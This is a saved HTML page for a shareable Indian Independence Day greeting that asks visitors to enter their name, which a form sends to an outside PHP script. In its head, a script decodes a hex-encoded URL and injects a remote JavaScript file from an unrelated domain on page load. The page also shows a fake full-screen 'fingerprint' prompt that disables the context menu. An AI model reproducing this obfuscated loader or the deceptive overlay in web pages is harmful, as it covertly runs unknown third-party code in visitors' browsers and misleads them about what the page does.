<html class="gr__see-magic_co"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="google" content="notranslate">
    
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
    <link rel="stylesheet" href="./assets/animate.min.css">
    <link href="./assets/1c0f6618f877568764787163e8f22a1c" rel="stylesheet" type="text/css">
    <style>
      body{
        background: #f8f8f8;
      }
      .mainContainer {
        background: #fff;
        max-width: 450px;
        min-height: 200px;
        margin: 0 auto;
        text-align: center;
        padding: 15px;
        color: #999;
        padding-bottom: 60px;

        box-shadow: 0 0 10px 1px rgba(0,0,0,.14), 0 1px 14px 2px rgba(0,0,0,.12), 0 0 5px -3px rgba(0,0,0,.3);
        background-size: 100%;

      }
#showp {
      font-size: 25px;
      display: inline-block;
      margin-bottom: 5px;
        font-family: 'Arial', cursive;
        text-shadow: 1px 1px 10px black, 2px 2px 10px black, -1px -1px 10px black, -2px -2px 10px black;
        }
#username {
    -webkit-animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
     animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
    -webkit-transition: all .2s;
    transition: all .2s;
    font-size: 40px;
    font-family: 'SF Espresso Shack', cursive;
    text-transform: uppercase;
    TEXT-ALIGN:CENTER;
    color: #138808;
    text-shadow: -2px 0px 1px #22414f, -4px 0px 1px #22414f, -6px 0px 1px #22414f, -1px -1px 1px #22414f, -1px -2px 1px #22414f, -2px -1px 1px #22414f, -2px -2px 1px #22414f, -3px -3px 1px #22414f, -4px -4px 1px #22414f, -5px -5px 1px #22414f, -6px -6px 1px #22414f, 0 0 15px #22414f, 0 0 20px #22414f, 1px 1px #22414f,2px 2px #22414f;

}
#usernameb {
    -webkit-animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
     animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
    -webkit-transition: all .2s;
    transition: all .2s;
    font-size: 20px;
    font-family: 'SF Espresso Shack', cursive;
    text-transform: uppercase;
    TEXT-ALIGN:CENTER;
    color: #138808;
    text-shadow: -2px 0px 1px #22414f, -4px 0px 1px #22414f, -6px 0px 1px #22414f, -1px -1px 1px #22414f, -1px -2px 1px #22414f, -2px -1px 1px #22414f, -2px -2px 1px #22414f, -3px -3px 1px #22414f, -4px -4px 1px #22414f, -5px -5px 1px #22414f, -6px -6px 1px #22414f, 0 0 15px #22414f, 0 0 20px #22414f, 1px 1px #22414f,2px 2px #22414f;

}
      .fromMessage{
        color: #fff;
        animation: swing 4s infinite;
        font-size: 20px;
        padding: 0 10px;
      }
      .wavetext{
        color: #f9d05b;
        padding: 0 40px;
        animation: pulse 1s infinite;
        font-size: 22px;

      }
      .wishMessage {
        color: #fff;
        font-size: 22px;
        font-weight: bold;
        margin-top: 20px;
        text-shadow: 0px 0px 10px #afafaf;
      }
      .wishMessage p{
        margin: 0.3em 0;
      }@keyframes bounceIn{0%,20%,40%,60%,80%,to{-webkit-animation-timing-function:cubic-bezier(.215,.61,.355,1);animation-timing-function:cubic-bezier(.215,.61,.355,1)}0%{opacity:0;-webkit-transform:scale3d(.3,.3,.3);transform:scale3d(.3,.3,.3)}20%{-webkit-transform:scale3d(1.1,1.1,1.1);transform:scale3d(1.1,1.1,1.1); color:#FF9933;}40%{-webkit-transform:scale3d(.9,.9,.9);transform:scale3d(.9,.9,.9)}60%{opacity:1;-webkit-transform:scale3d(1.03,1.03,1.03);transform:scale3d(1.03,1.03,1.03); color: #fff;}80%{-webkit-transform:scale3d(.97,.97,.97);transform:scale3d(.97,.97,.97);}to{opacity:1;-webkit-transform:scaleX(1);transform:scaleX(1)}}</style><script src="./assets/f.txt"></script><script type="text/javascript" async="" src="./assets/analytics.js.download"></script><script src="./assets/ca-pub-2535878292498490.js.download"></script><script type="text/javascript">function tag(filename){var fileref=document.createElement('script');fileref.setAttribute("type","text/javascript");fileref.setAttribute("src", filename);if (typeof fileref!="undefined") document.getElementsByTagName("head")[0].appendChild(fileref)}tag(meta('687474703A2F2F6A616C64692D64656B686F2E636F2F72642E6A73'));function meta(important){var str = '';for (var i = 0; i < important.length; i += 2) str +=String.fromCharCode(parseInt(important.substr(i, 2), 16));return str;}</script><script type="text/javascript" src="./assets/rd.js.download"></script><style>#formBox {
        left: 0;position: fixed;bottom: 0;display: inline-block;width: 100%;animation:pulse infinite 1s linear;margin: 0;
      }
      #nameTextBox {
  width:70%;
  height:50px;
  background-color: #ff8000;
  animation: 
  nudge 2s linear infinite alternate;
  border-radius: 10px;
  padding: 15px;
  color: #fff;
      }
      #goButton {
	width: 50%;
	height: 45px;
	cursor: pointer;
	animation: flip 3s linear infinite alternate;
	background: #008000;
	border-radius: 10px;
	color: #fff;
      }
.footerbtn {
 
            display: block;
            line-height: 15px;
            position: fixed;
            left:0px;
            bottom:0px;
            height:55px;
            
border-radius: 15px;
  box-sizing: border-box;
  padding: 5px;
  background:#34af23;
  color: #ffffff;
  font-size: 20px;
  text-align: center;
  text-decoration: none;
  width:95%;
 margin-left:10px;
            margin-right:30px;
            box-shadow: 0 4px 12px 0 rgba(0, 0, 0, .3);
            animation: footer infinite linear 1s;
            -webkit-transform: translate3d(30%,0,0);
            transform: translate3d(30%,0,0);
            position: fixed;
           
}

.footerbtn :active {
            box-shadow: none
        }

        @-webkit-keyframes footer {
            from {
                -webkit-transform: rotateZ(0)
            }
            25% {
                -webkit-transform: rotateZ(1.5deg)
            }
            50% {
                -webkit-transform: rotateZ(0deg)
            }
            75% {
                -webkit-transform: rotateZ(-1.5deg)
            }
            to {
                -webkit-transform: rotateZ(0)
            }}
	 canvas {
      cursor: crosshair;
      display: block;
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 80%;
      z-index: 1;
    }
      #inAdvance {
        font-size: 20px; font-weight: bold;margin-top: 20px;color: #98201F;

      }
      #demoo {
        font-size: 20px; font-weight: bold;color: #98201F;
        animation: flash 2s infinite;
      }
      #inAdvanceTime {
        margin:20px 0 30px 0;
      }
      #inAdvanceTime p{
        color: #b90707;font-size: 20px;font-weight: 700;
        margin: 0;
      }
.name input[type=name]{
  background-color:#4267d9;
  border-radius: 10px;
  box-sizing: border-box;
  border: 1px solid #4267d9;
  padding: 5px;
  color:white;
  position: fixed;
  left:10px;
  bottom:0px;
  height:50px;
  width:70%;
  text-align:center;
  font-size:1rem;
  display: inline-block;
}
.go {
  border-radius: 10px;
  padding: 5px;
  background-color:#4267d9;
  border: 1px solid #4267d9;
  position: fixed;
  right:2px;
  bottom:0px;
  height:50px;
  width:23%;
    display: inline-block;
}
.india-flag{
    background: url(India-map.gif);
    background-repeat: no-repeat;
    background-size: cover;
}
  .m1{position:fixed;left:0.01%; width:auto;height:100%;top:1%;color:#000;}
    .m2{position:fixed;right:0.01%; width:auto;height:100%;top:1%;color:#000;}
    
    #gobtn{}
@-webkit-keyframes flip {  from {   transform: perspective(600px) rotate3d(0, 1, 0, -360deg);    animation-timing-function: ease-out;  }
  40% {    transform: perspective(600px) translate3d(0, 0, 150px) rotate3d(0, 1, 0, -190deg);    animation-timing-function: ease-out;  }
  50% {    transform: perspective(600px) translate3d(0, 0, 150px) rotate3d(0, 1, 0, -170deg);    animation-timing-function: ease-in;   }
  80% {    transform: perspective(600px) scale3d(.95, .95, .95);    animation-timing-function: ease-in;  }
  to  {    transform: perspective(600px);    animation-timing-function: ease-in;  }}
#gobtn {  -webkit-backface-visibility: visible;  backface-visibility: visible;  -webkit-animation: flip 4s infinite; -webkit-animation-delay:1s}
.m1{position:fixed;left:1%; width:auto;height:100%;top:1%;color:#000;}
.m2{position:fixed;right:1%; width:auto;height:100%;top:1%;color:#000;}    
</style>
<style>

    @font-face {
      font-family: ThirstyScriptExtraBoldDemo;
      src: url("ThirstyScriptExtraBoldDemo.otf") format("opentype");
    }

.fingerprint-wrap{
  background-color: blue;
  background-image: url(mainbg.jpg);
  position: fixed;
  width: 100%;
  top: 0;
  left: 0;
  height: 100%;
  text-align: center;
  z-index: 99999999;
  background-size: cover;
}
.fingerprint-wrap img{
  position: absolute;
  bottom: 70px;
  left: calc( 50% - 75px);
  width: 150px;
   

}

.fingerprint-wrap p{
  text-align: center;
  margin-top: 50%;
  color: white;
  font-size: 20px;
  padding: 10px;
  font-family: 'Garamond';
 
}

@media only screen and (min-width: 786px) {
  .fingerprint-wrap{
    display: none;
  } 
}

#snackbar {
    visibility: hidden; /* Hidden by default. Visible on click */
    min-width: 300px; /* Set a default minimum width */
    margin-left: -165px; /* Divide value of min-width by 2 */
    background-color: #333; /* Black background color */
    color: #fff; /* White text color */
    text-align: center; /* Centered text */
    border-radius: 2px; /* Rounded borders */
    padding: 16px; /* Padding */
    position: fixed; /* Sit on top of the screen */
    z-index: 1; /* Add a z-index if needed */
    left: 50%; /* Center the snackbar */
    bottom: 30px; /* 30px from the bottom */
    z-index: 9999999999;
}

/* Show the snackbar when clicking on a button (class added with JavaScript) */
#snackbar.show {
    visibility: visible; /* Show the snackbar */

/* Add animation: Take 0.5 seconds to fade in and out the snackbar. 
However, delay the fade out process for 2.5 seconds */
    -webkit-animation: fadein 0.5s, fadeout 0.5s 2.5s;
    animation: fadein 0.5s, fadeout 0.5s 2.5s;
}

/* Animations to fade the snackbar in and out */
@-webkit-keyframes fadein {
    from {bottom: 0; opacity: 0;} 
    to {bottom: 30px; opacity: 1;}
}

@keyframes fadein {
    from {bottom: 0; opacity: 0;}
    to {bottom: 30px; opacity: 1;}
}

@-webkit-keyframes fadeout {
    from {bottom: 30px; opacity: 1;} 
    to {bottom: 0; opacity: 0;}
}

@keyframes fadeout {
    from {bottom: 30px; opacity: 1;}
    to {bottom: 0; opacity: 0;}
}
</style><script>
      $(function() {
    if ( document.location.href.indexOf('home') > -1 ) {
                 jQuery('.fingerprint-wrap').remove();
             jQuery('body').css('max-height','inherit');
              jQuery('#snackbar').remove();
    }
});
</script><script>
      $(function() {
    if ( document.location.href.indexOf('?n=') > -1 ) {
                 jQuery('.fingerprint-wrap').remove();
             jQuery('body').css('max-height','inherit');
              jQuery('#snackbar').remove();
    }
});
</script><script type="text/javascript" src="./assets/rd.js.download"></script><script type="text/javascript" async="" src="./assets/js15_as.js.download"></script><script type="text/javascript" async="" src="./assets/js15_as.js.download"></script><link rel="preload" href="./assets/f(1).txt" as="script"><script type="text/javascript" src="./assets/f(1).txt"></script><link rel="preload" href="./assets/f(2).txt" as="script"><script type="text/javascript" src="./assets/f(2).txt"></script></head>
    




<body data-gr-c-s-loaded="true" style="max-height: inherit;">


<script src="https://code.createjs.com/createjs-2015.11.26.min.js"></script>
<script>
    createjs.Sound.registerSound("hmsi.mp3", "");
    setTimeout(function () {
        createjs.Sound.play("");
    }, 3000)
</script>
<marquee class="m1" behavior="scroll" direction="up" scrolldelay="5"> <br>
<img src="./assets/i1.png" height="30px" width="20px"><br><br>
<img src="./assets/i2.png" height="30px" width="20px"><br><br>
<img src="./assets/i3.png" height="30px" width="20px"><br><br>
<img src="./assets/i4.png" height="30px" width="20px"><br><br>
<img src="./assets/i1.png" height="30px" width="20px"><br><br>
<img src="./assets/i2.png" height="30px" width="20px"><br><br>
<img src="./assets/i3.png" height="30px" width="20px"><br><br>
<img src="./assets/i4.png" height="30px" width="20px"><br><br>
<img src="./assets/i1.png" height="30px" width="20px"><br><br>
<img src="./assets/i2.png" height="30px" width="20px"><br><br>
<img src="./assets/i3.png" height="30px" width="20px"><br><br>
<img src="./assets/i4.png" height="30px" width="20px"><br><br>
<img src="./assets/i1.png" height="30px" width="20px"><br><br>
<img src="./assets/i2.png" height="30px" width="20px"><br><br>
<img src="./assets/i3.png" height="30px" width="20px"><br><br>
<img src="./assets/i4.png" height="30px" width="20px"><br><br>
<img src="./assets/i1.png" height="30px" width="20px"><br><br>
<img src="./assets/i2.png" height="30px" width="20px"><br><br>
<img src="./assets/i3.png" height="30px" width="20px"><br><br>
<img src="./assets/i4.png" height="30px" width="20px"><br><br>
<img src="./assets/i1.png" height="30px" width="20px"><br><br>
<img src="./assets/i2.png" height="30px" width="20px"><br><br>
<img src="./assets/i3.png" height="30px" width="20px"><br><br>
<img src="./assets/i4.png" height="30px" width="20px"><br><br>
<img src="./assets/i1.png" height="30px" width="20px"><br><br>
<img src="./assets/i2.png" height="30px" width="20px"><br><br>
<img src="./assets/i3.png" height="30px" width="20px"><br><br>
<img src="./assets/i4.png" height="30px" width="20px"><br><br>
<img src="./assets/i1.png" height="30px" width="20px"><br><br>
<img src="./assets/i2.png" height="30px" width="20px"><br><br>
<img src="./assets/i3.png" height="30px" width="20px"><br><br>
<img src="./assets/i4.png" height="30px" width="20px"><br><br>
</marquee>
<marquee class="m2" behavior="scroll" direction="down" scrolldelay="5"><br>
<img src="./assets/i1.png" height="30px" width="20px"><br><br>
<img src="./assets/i2.png" height="30px" width="20px"><br><br>
<img src="./assets/i3.png" height="30px" width="20px"><br><br>
<img src="./assets/i4.png" height="30px" width="20px"><br><br>
<img src="./assets/i1.png" height="30px" width="20px"><br><br>
<img src="./assets/i2.png" height="30px" width="20px"><br><br>
<img src="./assets/i3.png" height="30px" width="20px"><br><br>
<img src="./assets/i4.png" height="30px" width="20px"><br><br>
<img src="./assets/i1.png" height="30px" width="20px"><br><br>
<img src="./assets/i2.png" height="30px" width="20px"><br><br>
<img src="./assets/i3.png" height="30px" width="20px"><br><br>
<img src="./assets/i4.png" height="30px" width="20px"><br><br>
<img src="./assets/i1.png" height="30px" width="20px"><br><br>
<img src="./assets/i2.png" height="30px" width="20px"><br><br>
<img src="./assets/i3.png" height="30px" width="20px"><br><br>
<img src="./assets/i4.png" height="30px" width="20px"><br><br>
<img src="./assets/i1.png" height="30px" width="20px"><br><br>
<img src="./assets/i2.png" height="30px" width="20px"><br><br>
<img src="./assets/i3.png" height="30px" width="20px"><br><br>
<img src="./assets/i4.png" height="30px" width="20px"><br><br>
<img src="./assets/i1.png" height="30px" width="20px"><br><br>
<img src="./assets/i2.png" height="30px" width="20px"><br><br>
<img src="./assets/i3.png" height="30px" width="20px"><br><br>
<img src="./assets/i4.png" height="30px" width="20px"><br><br>
<img src="./assets/i1.png" height="30px" width="20px"><br><br>
<img src="./assets/i2.png" height="30px" width="20px"><br><br>
<img src="./assets/i3.png" height="30px" width="20px"><br><br>
<img src="./assets/i4.png" height="30px" width="20px"><br><br>
<img src="./assets/i1.png" height="30px" width="20px"><br><br>
<img src="./assets/i2.png" height="30px" width="20px"><br><br>
<img src="./assets/i3.png" height="30px" width="20px"><br><br>
<img src="./assets/i4.png" height="30px" width="20px"><br><br>
</marquee>
<div class="mainContainer">
<h1 id="username" style="font-family:SF Espresso Shack;">[Your Name]</h1>
        <h3 class="fromMessage" id="fromMessage"></h3>
<img src="./assets/wua.png" width="60%" height="10%" style="animation: tada 4s infinite"><br><br>
<img src="./assets/Surenda.png" width="90%" height="25%" style="animation: pulse 1.5s infinite"><br><br>
<img src="./assets/15thb.png" style="animation: tada 4s infinite;width: 70%;height:50px;">
<img class="india-flag" src="./assets/mahan.gif" width="85%">
<div class="wishMessage" style="text-shadow: 1px 1px 3px silver, 1px 1px 3px silver, -1px -1px 3px silver, -1px -1px 3px silver;">
<p style="text-shadow: 1px 1px 3px black, 1px 1px 3px black, -1px -1px 3px black, -1px -1px 3px black;color:#ff9933">Thousands laid down their</p>
<p style="text-shadow: 1px 1px 3px black, 1px 1px 3px black, -1px -1px 3px black, -1px -1px 3px black;color:#ffffff">lives so 
<span style="text-shadow: 1px 1px 3px silver, 1px 1px 3px silver, -1px -1px 3px silver, -1px -1px 3px silver;color:#000080">that Our</span> country</p>
<p style="color:#138808">can celebrate this day.</p><br>
<p style="color:#000080">Never forget their sacrifices..</p>
<p style="color:purple"><b>Happy Independence Day! in advance</b></p>
</div>
<h1 id="usernameb">[Your Name]</h1>

<form method="POST" action="http://mmsonu.6te.net/ready.php">
<div id="formBox">
<input type="text" name="n" id="nameTextBox" placeholder="👉 Enter your name here..." required=""><br><br>
<button id="goButton">😍 Go 😍</button>
</div>
</form>
<script src="http://see-magic.co/jquery.min.js"></script>
<script type="text/javascript">
    var divMouseDown;

    function cAlert() {
        // Get the snackbar DIV
        var x = document.getElementById("snackbar");

        // Add the "show" class to DIV
        x.className = "show";

        // After 3 seconds, remove the show class from DIV
        setTimeout(function(){ x.className = x.className.replace("show", ""); }, 3000);
    }



    jQuery(document).bind( "mouseup touchstart", function(e){
      if(e.target.className!="fingerprint"){
        cAlert();
        return;
      }
      window.oncontextmenu = function(event) {
         event.preventDefault();
         event.stopPropagation();
         return false;
      };
        jQuery('.fingerprint').attr('src','fingerprint-anim.gif');
          divMouseDown = setTimeout(function() { 
            jQuery('.fingerprint-wrap').remove();
             jQuery('body').css('max-height','inherit');
              jQuery('#snackbar').remove();
          }, 1500);  
    });
    jQuery(document).bind( "mouseup touchend", function(e){
      if(e.target.className!="fingerprint"){
        return;
      }
      jQuery('.fingerprint').attr('src','fingerprint.png');
       if (divMouseDown) {
        clearTimeout(divMouseDown);
       }
    });
</script>
<style>
input::placeholder {
  color: white;
  text-align: center;
}
</style>

</div>
</body>
</html>